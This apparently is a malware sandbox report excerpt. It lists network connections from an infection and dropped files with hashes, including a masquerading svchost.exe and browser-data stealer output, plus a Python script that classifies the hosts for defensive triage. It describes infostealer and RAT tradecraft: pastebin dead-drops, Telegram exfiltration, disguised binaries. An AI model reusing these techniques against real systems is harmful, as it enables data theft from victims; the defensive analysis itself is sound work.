US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 icanhazip.com udp
US 104.16.185.241:80 icanhazip.com tcp
US 8.8.8.8:53 api.mylnikov.org udp
US 172.67.196.114:443 api.mylnikov.org tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 241.185.16.104.in-addr.arpa udp
US 8.8.8.8:53 114.196.67.172.in-addr.arpa udp
N/A 127.0.0.1:6606 tcp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
N/A 127.0.0.1:7707 tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
N/A 127.0.0.1:7707 tcp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 104.20.3.235:443 pastebin.com tcp
N/A 127.0.0.1:8808 tcp
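The Network table above mixes resolver traffic, a reverse lookup for every contacted IP, the GitHub download, the repeated pastebin.com fetches that the report flags as abuse of a legitimate hosting service, external-IP and geolocation lookups, a Telegram API connection, and three loopback connections to ports 6606, 7707 and 8808. The following is an added example (not the sandbox's code) that parses rows in that table's layout, drops the resolver noise, and buckets what remains by role. The role assignments follow the signatures and command lines in this report; grouping 6606/7707/8808 together rests on those being AsyncRAT's stock port list, which is an assumption about why they appear here, and the rows embedded below are a copy of a subset of the table, not live data.

```python
"""Triage of a sandbox Network table: parse rows, drop resolver noise, bucket by role.
Added example; the rows are copied from this report's table, not fetched live."""
from collections import defaultdict

NETWORK_ROWS = """\
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 104.20.3.235:443 pastebin.com tcp
US 104.16.185.241:80 icanhazip.com tcp
US 172.67.196.114:443 api.mylnikov.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
N/A 127.0.0.1:6606 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:8808 tcp
"""

# Domain -> role, taken from the signatures and command lines in this report.
ROLE_BY_DOMAIN = {
    "github.com": "payload_hosting",                  # curl ... releases/download/V1.0/exm.zip
    "objects.githubusercontent.com": "payload_hosting",
    "pastebin.com": "dead_drop_resolver",             # "Legitimate hosting services abused for C2"
    "icanhazip.com": "external_ip_lookup",
    "api.mylnikov.org": "geolocation_lookup",
    "api.telegram.org": "exfil_over_web_service",
}
ASYNCRAT_DEFAULT_PORTS = {6606, 7707, 8808}  # assumption: AsyncRAT's stock port list


def parse_rows(text):
    """Yield (country, ip, port, domain, proto). A row with no Domain column
    (the loopback entries) has only three fields and gets an empty domain."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:
            country, dest, proto = parts
            domain = ""
        else:
            continue
        ip, port = dest.rsplit(":", 1)
        yield country, ip, int(port), domain, proto


def classify(ip, port, domain):
    """Map one row to a role; resolver queries and reverse lookups are noise."""
    if domain.endswith(".in-addr.arpa") or (port == 53 and ip == "8.8.8.8"):
        return "resolver_noise"
    if ip.startswith("127.") and port in ASYNCRAT_DEFAULT_PORTS:
        return "loopback_asyncrat_default_port"
    return ROLE_BY_DOMAIN.get(domain, "unclassified")


def triage(text):
    """Bucket (host, port) pairs by role, with resolver noise removed."""
    buckets = defaultdict(set)
    for _country, ip, port, domain, _proto in parse_rows(text):
        role = classify(ip, port, domain)
        if role != "resolver_noise":
            buckets[role].add((domain or ip, port))
    return {role: sorted(entries) for role, entries in buckets.items()}


if __name__ == "__main__":
    for role, entries in sorted(triage(NETWORK_ROWS).items()):
        print(f"{role:32} " + ", ".join(f"{h}:{p}" for h, p in entries))
```

The loopback rows are the odd ones: a RAT connecting to 127.0.0.1 on its configured ports means no live C2 endpoint was reached in this run, so the pastebin.com fetches that precede each loopback attempt in the table are the indicator to hunt on, not a C2 IP. The reverse lookups (`*.in-addr.arpa`) are the sandbox resolving every contacted address and carry no information about the sample.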

Files

memory/1340-0-0x00007FFD2F563000-0x00007FFD2F565000-memory.dmp

memory/1340-1-0x000001E87FC70000-0x000001E87FC92000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ikyrx0pw.2wy.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1340-11-0x00007FFD2F560000-0x00007FFD30021000-memory.dmp

memory/1340-12-0x00007FFD2F560000-0x00007FFD30021000-memory.dmp

memory/1340-15-0x00007FFD2F560000-0x00007FFD30021000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 50a8221b93fbd2628ac460dd408a9fc1
SHA1 7e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA256 46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA512 27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

memory/4780-28-0x000002255AAD0000-0x000002255AAE2000-memory.dmp

memory/4780-29-0x00000225585A0000-0x00000225585AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\exm.zip

MD5 57a6527690625bea4e4f668e7db6b2aa
SHA1 c5799fd94999d128203e81e22c6d9fdb86e167ee
SHA256 076e01b09f9c5cccc273b2f7dfa1a1efccc1a8e8ebf98a7eee756024b93bad17
SHA512 d86c7f79989eb0781e15f8631048506ffab338f933ddfedbcc2c7464447770beaf21b7ed3cba2ebb97be5ffdc9a450f2df2e2313efaeb8e8101f2ee53c066e4e

C:\exm\EXMservice.exe

MD5 aab9c36b98e2aeff996b3b38db070527
SHA1 4c2910e1e9b643f16269a2e59e3ada80fa70e5fa
SHA256 c148cc14f15b71a2d3f5e6bce6b706744f6b373a7e6c090c14f46f81d2d6e82f
SHA512 0db75756a041a7cda6b384718581aaf11e6873614465dd56e81f17ad171cffe380e288a3c2ee540222190392904921f26df8a1d66d4108051c60fc8e5b2df779

memory/3928-71-0x0000000000780000-0x00000000007E6000-memory.dmp

C:\Users\Admin\msedge.exe

MD5 f1c2525da4f545e783535c2875962c13
SHA1 92bf515741775fac22690efc0e400f6997eba735
SHA256 9e6985fdb3bfa539f3d6d6fca9aaf18356c28a00604c4f961562c34fa9f11d0f
SHA512 56308ac106caa84798925661406a25047df8d90e4b65b587b261010293587938fa922fbb2cfdedfe71139e16bfcf38e54bb31cbcc00cd244db15d756459b6133

C:\Users\Admin\svchost.exe

MD5 1bea6c3f126cf5446f134d0926705cee
SHA1 02c49933d0c2cc068402a93578d4768745490d58
SHA256 1d69b5b87c4cd1251c5c94461a455659febb683eab0ebd97dd30da2319ffc638
SHA512 eb9f423f6adb5e686a53f5f197e6b08455f8048d965a9ec850838fdf4724ef87f68945c435ace5a48a9a7226006a348e97586335d0246ea0dc898a412dea5df3

memory/1412-127-0x00000000000D0000-0x00000000000FA000-memory.dmp

memory/1872-132-0x0000000000E70000-0x0000000000EAE000-memory.dmp

memory/1872-133-0x0000000005E70000-0x0000000005ED6000-memory.dmp

C:\Users\Admin\AppData\Local\fa3df1b47ae9aee81ee7a9709055c065\Admin@UTKBEBLO_en-US\Browsers\Firefox\Bookmarks.txt

MD5 2e9d094dda5cdc3ce6519f75943a4ff4
SHA1 5d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256 c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512 d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

C:\Users\Admin\AppData\Local\fa3df1b47ae9aee81ee7a9709055c065\Admin@UTKBEBLO_en-US\System\Process.txt

MD5 ce55a125bf7f33cd38b148013632b27a
SHA1 015fd2fe46b32ca28191d8a3bec3f711e94f093b
SHA256 9fa2c29b9e62e49fbb7a03b02155ccb99adac31ef8f93fa0807c9c55424a0046
SHA512 6ec76a7a646b703bf3051684de09b760edd06cda1c04f636aee54a3772ebc34b3f8d8591d61a86f94b8f655c2321092ba4e4a30f752e794ea4e150b84afd216f

memory/1872-291-0x00000000067E0000-0x0000000006872000-memory.dmp

memory/1872-292-0x0000000006E30000-0x00000000073D4000-memory.dmp

memory/1872-296-0x00000000069A0000-0x00000000069AA000-memory.dmp

C:\Users\Admin\AppData\Local\9a51fd45f5964912bf4f17da1ae8100f\msgid.dat

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2b8634a147a40bf4e6836be570a3e21d
SHA1 a1f2eb05ade58e4aa48b156e5de8d72dc04c4ad3
SHA256 2516904bf17e895f7b0c9bfec81fe1516de4d37c6a2835b8c83aa79f670f63ce
SHA512 78c5348a121bc00e6f7427dc4b11c301c4f2e898c4108eb328c8a740d96fc8a8a1f869b3769e84ec1b36fc483280ae7b6d5e9981e7bf2facd548944b036a0bd8